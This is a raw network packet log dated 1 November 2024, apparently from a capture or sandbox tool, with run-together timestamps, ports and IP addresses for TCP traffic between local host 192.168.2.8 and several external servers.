                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.481234074 CET4977080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.481409073 CET4977080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.481442928 CET4977080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.486505032 CET804977018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.486517906 CET804977018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.502891064 CET804976818.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.503063917 CET4976880192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.508106947 CET804976818.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.508172989 CET4976880192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.523547888 CET4977180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.528377056 CET804977118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.528443098 CET4977180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.528558969 CET4977180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.528584957 CET4977180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.533406019 CET804977118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.533421993 CET804977118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.736927986 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.741785049 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.007426023 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.009007931 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.013984919 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.148029089 CET804977018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.148178101 CET4977080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.153336048 CET804977018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.153390884 CET4977080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.217323065 CET804977118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.217684984 CET4977180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.222986937 CET804977118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.223038912 CET4977180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.275357962 CET4977280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.280163050 CET804977244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.281033039 CET4977280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.281198978 CET4977280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.281239033 CET4977280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.285934925 CET804977244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.285957098 CET804977244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.324094057 CET4977380192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.329068899 CET8049773208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.329683065 CET4977380192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.837600946 CET4978180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.840864897 CET4978180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.840883017 CET4978180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.845818996 CET804978118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.845830917 CET804978118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.917217016 CET804978054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.919059992 CET4978080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.924623013 CET804978054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.924680948 CET4978080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.286418915 CET4978280192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.291404963 CET804978235.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.291465044 CET4978280192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.291610003 CET4978280192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.291623116 CET4978280192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.296473980 CET804978235.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.296485901 CET804978235.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.499131918 CET804978118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.499284029 CET4978180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.504522085 CET804978118.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.504580021 CET4978180192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.533659935 CET4978380192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.538387060 CET804978313.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.538456917 CET4978380192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.538604021 CET4978380192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.538624048 CET4978380192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.543414116 CET804978313.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.543425083 CET804978313.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.042154074 CET4978380192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.118083954 CET4978480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.123003960 CET804978413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.123091936 CET4978480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.129843950 CET804978235.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.136745930 CET4978480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.136853933 CET4978480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.141726017 CET804978413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.141737938 CET804978413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.148832083 CET4978280192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.154167891 CET804978235.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.154247999 CET4978280192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.814917088 CET4978580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.820298910 CET80497853.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.820590019 CET4978580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.828222990 CET4978580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.828263044 CET4978580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.833123922 CET80497853.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.833132982 CET80497853.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.492218971 CET80497853.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.526324034 CET80497853.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.527714014 CET4978580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.539546013 CET4978580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.544349909 CET80497853.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.561320066 CET804978413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.611660004 CET4978480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.731893063 CET4978480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.737370968 CET804978413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.737608910 CET4978480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.840809107 CET4978680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.845640898 CET804978613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.410424948 CET8049791208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.455334902 CET4979180192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.520085096 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.522968054 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.527908087 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.541127920 CET4979380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.546516895 CET804979334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.546600103 CET4979380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.546741962 CET4979380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.546741962 CET4979380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.551564932 CET804979334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.551579952 CET804979334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.385570049 CET804979334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.385967016 CET4979380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.393398046 CET804979334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.393471956 CET4979380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.432513952 CET804979247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.433512926 CET4979280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.438846111 CET804979247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.439161062 CET4979280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.472137928 CET4979480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.476996899 CET804979413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.477402925 CET4979480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.477569103 CET4979480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.477596998 CET4979480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.482357025 CET804979413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.482814074 CET804979413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.487365961 CET4979580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.492697954 CET804979554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.492769957 CET4979580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.492954969 CET4979580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.493026018 CET4979580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.497833014 CET804979554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.497843981 CET804979554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.326581955 CET804979554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.326730013 CET4979580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.331855059 CET804979554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.331902027 CET4979580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.594580889 CET4979680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.599916935 CET804979618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.599988937 CET4979680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.600342989 CET4979680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.600387096 CET4979680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.606132030 CET804979618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.606142998 CET804979618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.918073893 CET804979413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.918205976 CET4979480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.923214912 CET804979413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.923270941 CET4979480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.138331890 CET4979780192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.143271923 CET804979734.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.143632889 CET4979780192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.143762112 CET4979780192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.143785954 CET4979780192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.148596048 CET804979734.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.148606062 CET804979734.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.967966080 CET804979734.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.969887018 CET4979780192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.073270082 CET4980580192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.077306986 CET4980580192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.077476025 CET4980580192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.082151890 CET804980585.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.082308054 CET804980585.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.368484020 CET804980318.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.370906115 CET4980380192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.376039028 CET804980318.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.376590967 CET4980380192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.568332911 CET4980680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.573348045 CET804980618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.573431015 CET4980680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.573637962 CET4980680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.573637962 CET4980680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.578478098 CET804980618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.578495026 CET804980618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.943753958 CET804980585.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.943802118 CET804980585.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.943866014 CET4980580192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.987036943 CET4980780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.991889954 CET804980747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.991961956 CET4980780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.992387056 CET4980780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.992409945 CET4980780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.997426033 CET804980747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.997447968 CET804980747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.400188923 CET804980618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.400346041 CET4980680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.405560017 CET804980618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.405616045 CET4980680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.523380995 CET4980880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.528153896 CET804980818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.528382063 CET4980880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.533565998 CET4980880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.533608913 CET4980880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.538429022 CET804980818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.538517952 CET804980818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.203380108 CET804980818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.203921080 CET4980880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.210047007 CET804980818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.213682890 CET4980880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.324286938 CET4980980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.329170942 CET804980913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.329243898 CET4980980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.329370975 CET4980980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.329399109 CET4980980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.334290981 CET804980913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.334305048 CET804980913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.442374945 CET804980747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.442589998 CET4980780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.447674990 CET804980747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.447740078 CET4980780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.670137882 CET4981080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.674973011 CET804981034.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.675100088 CET4981080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.675199986 CET4981080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.675215960 CET4981080192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.680072069 CET804981034.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.595690966 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.595730066 CET4983880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.595746994 CET4983880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.600414038 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.600538015 CET804983847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.600662947 CET804983847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.800206900 CET804982713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.800427914 CET4982780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.811739922 CET804982713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.813633919 CET4982780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.843184948 CET4983980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.848062992 CET804983934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.849759102 CET4983980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.849875927 CET4983980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.849893093 CET4983980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.854757071 CET804983934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.854770899 CET804983934.246.200.160192.168.2.8
